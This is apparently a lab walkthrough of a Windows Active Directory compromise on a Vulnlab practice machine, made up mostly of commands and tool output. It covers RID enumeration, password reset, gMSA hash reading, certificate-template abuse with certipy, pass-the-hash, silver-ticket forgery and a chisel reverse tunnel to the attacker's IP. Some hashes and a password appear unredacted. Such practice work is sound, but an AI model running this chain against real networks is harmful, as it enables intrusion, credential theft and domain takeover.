vulnlab sendai
a medium windows machine
enum
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --users --shares
SMB dc.sendai.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB dc.sendai.vl 445 DC [+] sendai.vl\puck:
SMB dc.sendai.vl 445 DC [+] Enumerated shares
SMB dc.sendai.vl 445 DC Share Permissions Remark
SMB dc.sendai.vl 445 DC ----- ----------- ------
SMB dc.sendai.vl 445 DC ADMIN$ Remote Admin
SMB dc.sendai.vl 445 DC C$ Default share
SMB dc.sendai.vl 445 DC config
SMB dc.sendai.vl 445 DC IPC$ READ Remote IPC
SMB dc.sendai.vl 445 DC NETLOGON Logon server share
SMB dc.sendai.vl 445 DC sendai READ company share
SMB dc.sendai.vl 445 DC SYSVOL Logon server share
SMB dc.sendai.vl 445 DC Users READ
SMB dc.sendai.vl 445 DC [-] Error enumerating domain users using dc ip dc.sendai.vl: NTLM needs domain\username and a password
SMB dc.sendai.vl 445 DC [*] Trying with SAMRPC protocol
┌──(puck㉿kali)-[~/vulnlab/sendai]
.
rid-brute
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --rid-brute 10000
SMB dc.sendai.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB dc.sendai.vl 445 DC [+] sendai.vl\puck:
SMB dc.sendai.vl 445 DC [+] Brute forcing RIDs
SMB dc.sendai.vl 445 DC 498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB dc.sendai.vl 445 DC 500: SENDAI\Administrator (SidTypeUser)
SMB dc.sendai.vl 445 DC 501: SENDAI\Guest (SidTypeUser)
SMB dc.sendai.vl 445 DC 502: SENDAI\krbtgt (SidTypeUser)
SMB dc.sendai.vl 445 DC 512: SENDAI\Domain Admins (SidTypeGroup)
SMB dc.sendai.vl 445 DC 513: SENDAI\Domain Users (SidTypeGroup)
SMB dc.sendai.vl 445 DC 514: SENDAI\Domain Guests (SidTypeGroup)
SMB dc.sendai.vl 445 DC 515: SENDAI\Domain Computers (SidTypeGroup)
SMB dc.sendai.vl 445 DC 516: SENDAI\Domain Controllers (SidTypeGroup)
SMB dc.sendai.vl 445 DC 517: SENDAI\Cert Publishers (SidTypeAlias)
SMB dc.sendai.vl 445 DC 518: SENDAI\Schema Admins (SidTypeGroup)
SMB dc.sendai.vl 445 DC 519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB dc.sendai.vl 445 DC 520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB dc.sendai.vl 445 DC 521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB dc.sendai.vl 445 DC 522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB dc.sendai.vl 445 DC 525: SENDAI\Protected Users (SidTypeGroup)
SMB dc.sendai.vl 445 DC 526: SENDAI\Key Admins (SidTypeGroup)
SMB dc.sendai.vl 445 DC 527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB dc.sendai.vl 445 DC 553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB dc.sendai.vl 445 DC 571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB dc.sendai.vl 445 DC 572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB dc.sendai.vl 445 DC 1000: SENDAI\DC$ (SidTypeUser)
SMB dc.sendai.vl 445 DC 1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB dc.sendai.vl 445 DC 1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB dc.sendai.vl 445 DC 1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB dc.sendai.vl 445 DC 1104: SENDAI\sqlsvc (SidTypeUser)
SMB dc.sendai.vl 445 DC 1105: SENDAI\websvc (SidTypeUser)
SMB dc.sendai.vl 445 DC 1107: SENDAI\staff (SidTypeGroup)
SMB dc.sendai.vl 445 DC 1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB dc.sendai.vl 445 DC 1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB dc.sendai.vl 445 DC 1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB dc.sendai.vl 445 DC 1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB dc.sendai.vl 445 DC 1112: SENDAI\Susan.Harper (SidTypeUser)
SMB dc.sendai.vl 445 DC 1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB dc.sendai.vl 445 DC 1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB dc.sendai.vl 445 DC 1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB dc.sendai.vl 445 DC 1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB dc.sendai.vl 445 DC 1117: SENDAI\Jason.Brady (SidTypeUser)
SMB dc.sendai.vl 445 DC 1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB dc.sendai.vl 445 DC 1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB dc.sendai.vl 445 DC 1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB dc.sendai.vl 445 DC 1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB dc.sendai.vl 445 DC 1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB dc.sendai.vl 445 DC 1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB dc.sendai.vl 445 DC 1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB dc.sendai.vl 445 DC 1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB dc.sendai.vl 445 DC 1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB dc.sendai.vl 445 DC 1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB dc.sendai.vl 445 DC 1128: SENDAI\ca-operators (SidTypeGroup)
SMB dc.sendai.vl 445 DC 1129: SENDAI\admsvc (SidTypeGroup)
SMB dc.sendai.vl 445 DC 1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB dc.sendai.vl 445 DC 1131: SENDAI\support (SidTypeGroup)
┌──(puck㉿kali)-[~/vulnlab/sendai]
cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
Check for password must change
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u users.txt -p '' --continue-on-success
SMB dc.sendai.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB dc.sendai.vl 445 DC [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [+] sendai.vl\Guest:
SMB dc.sendai.vl 445 DC [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [+] sendai.vl\Domain:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Domain:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Domain:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Domain:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Domain:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Cert:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Schema:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Enterprise:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Group:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Read-only:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Cloneable:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Protected:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Key:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Enterprise:
SMB dc.sendai.vl 445 DC [+] sendai.vl\RAS:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Allowed:
SMB dc.sendai.vl 445 DC [+] sendai.vl\Denied:
SMB dc.sendai.vl 445 DC [-] sendai.vl\DC$: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [+] sendai.vl\DnsAdmins:
SMB dc.sendai.vl 445 DC [+] sendai.vl\DnsUpdateProxy:
SMB dc.sendai.vl 445 DC [+] sendai.vl\SQLServer2005SQLBrowserUser$DC:
SMB dc.sendai.vl 445 DC [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\websvc: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [+] sendai.vl\staff:
SMB dc.sendai.vl 445 DC [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
SMB dc.sendai.vl 445 DC [+] sendai.vl\ca-operators:
SMB dc.sendai.vl 445 DC [+] sendai.vl\admsvc:
SMB dc.sendai.vl 445 DC [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE
SMB dc.sendai.vl 445 DC [+] sendai.vl\support:
SMB dc.sendai.vl 445 DC [+] sendai.vl\:
SMB dc.sendai.vl 445 DC [+] sendai.vl\:
┌──(puck㉿kali)-[~/vulnlab/sendai]
.
change smb pass
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-smbpasswd -newpass Passw0rd@ 'Elliot.Yates':@sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
┌──(puck㉿kali)-[~/vulnlab/sendai]
Enumerating some more
┌──(puck㉿kali)-[~/vulnhub/sendai] └─$ impacket-smbclient sendai.vl/'Elliot.Yates':'Passw0rd@'sendai.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra Type help for list of commands # shares ADMIN$ C$ config IPC$ NETLOGON sendai SYSVOL Users # use config # ls drw-rw-rw- 0 Thu Jun 13 13:22:52 2024 . drw-rw-rw- 0 Wed Jul 19 10:11:25 2023 .. -rw-rw-rw- 78 Tue Jul 11 08:57:10 2023 .sqlconfig # get .sqlconfig --- ┌──(puck㉿kali)-[~/vulnhlab/sendai] └─$ cat .sqlconfig Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Su<REDACTED>85; --- ┌──(puck㉿kali)-[~/vulnhub/sendai] └─$ bloodhound-python -u sqlsvc -p Su<REDACTED>85 -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.69.199 INFO: Found AD domain: sendai.vl INFO: Getting TGT for user INFO: Connecting to LDAP server: dc.sendai.vl INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.sendai.vl INFO: Found 27 users INFO: Found 57 groups INFO: Found 2 gpos INFO: Found 5 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.sendai.vl INFO: Done in 00M 09S
Do the bloodhound thing
We have a GenericAll on ADMSVC$, and ADMSVC@sendai.vl can read the GMSAPasword of mgtsvc$
┌──(puck㉿kali)-[~/vulnlab/sendai] └─$ net rpc group addmem "ADMSVC" Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl Password for [SENDAI.VL\Elliot.Yates]:Passw0rd@
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa
SMB dc.sendai.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP dc.sendai.vl 636 DC [+] sendai.vl\Elliot.Yates:Passw0rd@
LDAP dc.sendai.vl 636 DC [*] Getting GMSA Passwords
LDAP dc.sendai.vl 636 DC Account: mgtsvc$ NTLM: 57<REDACTED>11
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec winrm sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11
SMB dc.sendai.vl 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
HTTP dc.sendai.vl 5985 DC [*] http://dc.sendai.vl:5985/wsman
WINRM dc.sendai.vl 5985 DC [+] sendai.vl\mgtsvc$:57<REDACTED>11 (Pwn3d!)
Evil-WinRm to the box & PrivEsccheck.ps1
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents>
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cat c:\user.txt
VL{e01<REDACTED>62}
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/14/2024 1:04 AM temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload PrivescCheck.ps1
Info: Uploading /home/puck/vulnlab/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1
Data: 394496 bytes of 394496 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp>
*Evil-WinRM* PS C:\temp> . .\PrivescCheck.ps1; Invoke-PrivescCheck
+------+------------------------------------------------+------+
| TEST | USER > Privileges | VULN |
+------+------------------------------------------------+------+
| DESC | List the privileges that are associated to the |
| | current user's token. If any of them can be leveraged |
| | to somehow run code in the context of the SYSTEM |
| | account, it will be reported as a finding. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | USER > Environment Variables | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
| | and try to identify any potentially sensitive |
| | information such as passwords or API secrets. This |
| | check is simply based on keyword matching and might |
| | not be entirely reliable. |
+------+-------------------------------------------------------+
[!] Nothing found.
+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones |
| | that are built into Windows. It does so by parsing |
| | the target executable's metadata. |
+------+-------------------------------------------------------+
[*] Found 13 result(s).
Name : Amazon EC2Launch
DisplayName : Amazon EC2Launch
ImagePath : "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
User : LocalSystem
StartMode : Automatic
Name : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User : LocalSystem
StartMode : Automatic
Name : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User : LocalSystem
StartMode : Automatic
Name : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User : SENDAI\sqlsvc
StartMode : Automatic
Name : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User : NT AUTHORITY\NETWORKSERVICE
StartMode : Disabled
Name : SQLBrowser
DisplayName : SQL Server Browser
ImagePath : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User : NT AUTHORITY\LOCALSERVICE
StartMode : Disabled
Name : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode : Automatic
Name : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User : LocalSystem
StartMode : Automatic
Name : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath : C:\Windows\System32\OpenSSH\ssh-agent.exe
User : LocalSystem
StartMode : Disabled
Name : Support
DisplayName :
ImagePath : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User : LocalSystem
StartMode : Automatic
Name : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User : LocalSystem
StartMode : Automatic
Name : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath : C:\Windows\system32\vm3dservice.exe
User : LocalSystem
StartMode : Automatic
Name : VMTools
DisplayName : VMware Tools
ImagePath : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User : LocalSystem
StartMode : Automatic
+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - SCM | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and |
| | check whether the current user can modify any |
| | registered service. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - Registry | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
| | can modify the configuration of any registered |
| | service. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user |
| | can modify the target executable or write files in |
| | its parent folder. |
+------+-------------------------------------------------------+
.
ADCS Enum with Certipy-ad
┌──(puck㉿kali)-[~/vulnlab/sendai] └─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p 'Passw0rd@' -M ADCS SMB dc.sendai.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False) LDAP dc.sendai.vl 389 DC [+] sendai.vl\Elliot.Yates:Passw0rd@ ADCS Found PKI Enrollment Server: dc.sendai.vl ADCS Found CN: sendai-DC-CA ADCS Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad find -u 'clifford.davey' -p 'RF<REDACTED>3p' -dc-ip 10.10.69.199 -dns-tcp -ns 10.10.69.199 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.69.199:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'dc.sendai.vl' at '10.10.69.199'
[*] Trying to get CA configuration for 'sendai-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.69.199
[!] Got error while trying to get CA configuration for 'sendai-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sendai.vl' (10.10.69.199)
[*] Got CA configuration for 'sendai-DC-CA'
[+] Resolved 'dc.sendai.vl' from cache: 10.10.69.199
[+] Connecting to 10.10.69.199:80
[*] Saved BloodHound data to '20240614041344_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20240614041344_Certipy.txt'
[*] Saved JSON output to '20240614041344_Certipy.json'
┌──(puck㉿kali)-[~/vulnlab/sendai]
findings
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep ESC
"ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep SendaiComputer
"Template Name": "SendaiComputer",
"Display Name": "SendaiComputer",
Abuse the template
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
┌──(puck㉿kali)-[~/vulnlab/sendai]
Run certipy-ad again
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
running certipy-ad -find again, we now find
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614042650_Certipy.json | grep ESC
"ESC1": "'SENDAI.VL\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
"ESC2": "'SENDAI.VL\\\\Authenticated Users' can enroll and template can be used for any purpose",
"ESC3": "'SENDAI.VL\\\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
"ESC4": "'SENDAI.VL\\\\Authenticated Users' has dangerous permissions"
Request Administrator Cert
┌──(puck㉿kali)-[~/vulnlab/sendai] └─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [-] Got error: The NETBIOS connection with the remote host timed out. [-] Use -debug to print a stacktrace
Fixxed the “NETBIOS connection with the remote host timed out” by changing the order to
┌──(puck㉿kali)-[~/vulnlab/sendai] └─$ cat /etc/hosts | grep sendai 10.10.69.199 sendai.vl dc.sendai.vl
Try again
┌──(puck㉿kali)-[~/vulnlab/sendai] └─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 6 [*] Got certificate with UPN 'administrator@sendai.vl' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
obtain tgt & admin hash
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.69.199
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cf<REDACTED>7a
┌──(puck㉿kali)-[~/vulnlab/sendai]
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u administrator -H cf<REDACTED>7a
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/18/2023 6:15 AM 36 root.txt
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{ae<REDACTED>61}
*Evil-WinRM* PS C:\Users\Administrator\desktop>
That’s all.
Other way to root not finished yet
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
ticketer.py: command not found
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-ticketer -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$
Set up a chisel listener
┌──(puck㉿kali)-[~/vulnlab/sendai] └─$ chisel server -p 8001 --reverse 2024/06/14 08:21:52 server: Reverse tunnelling enabled 2024/06/14 08:21:52 server: Fingerprint 6C2g9JWtYeT92LZsgr5dckEz87F24T+dsXH6dsDjhDo= 2024/06/14 08:21:52 server: Listening on http://0.0.0.0:8001 2024/06/14 08:24:27 server: session#1: Client version (1.9.1) differs from server version (1.9.1-0kali1) 2024/06/14 08:24:27 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
then
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains impacket-mssqlclient dc.sendai.vl -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... dc.sendai.vl:1433 ... OK
[*] Encryption required, switching to TLS
┌──(puck㉿kali)-[~/vulnlab/sendai]
and from sendai box
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload chisel.exe
Info: Uploading /home/puck/vulnlab/sendai/chisel.exe to C:\temp\chisel.exe
Data: 12008104 bytes of 12008104 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./chisel.exe client 10.8.2.138:8001 R:1080:socks
chisel.exe : 2024/06/14 05:24:26 client: Connecting to ws://10.8.2.138:8001
+ CategoryInfo : NotSpecified: (2024/06/14 05:2...10.8.2.138:8001:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2024/06/14 05:24:26 client: Connected (Latency 20.3373ms)
work in progress
as chisel is working fine
┌──(puck㉿kali)-[~/vulnlab/sendai]
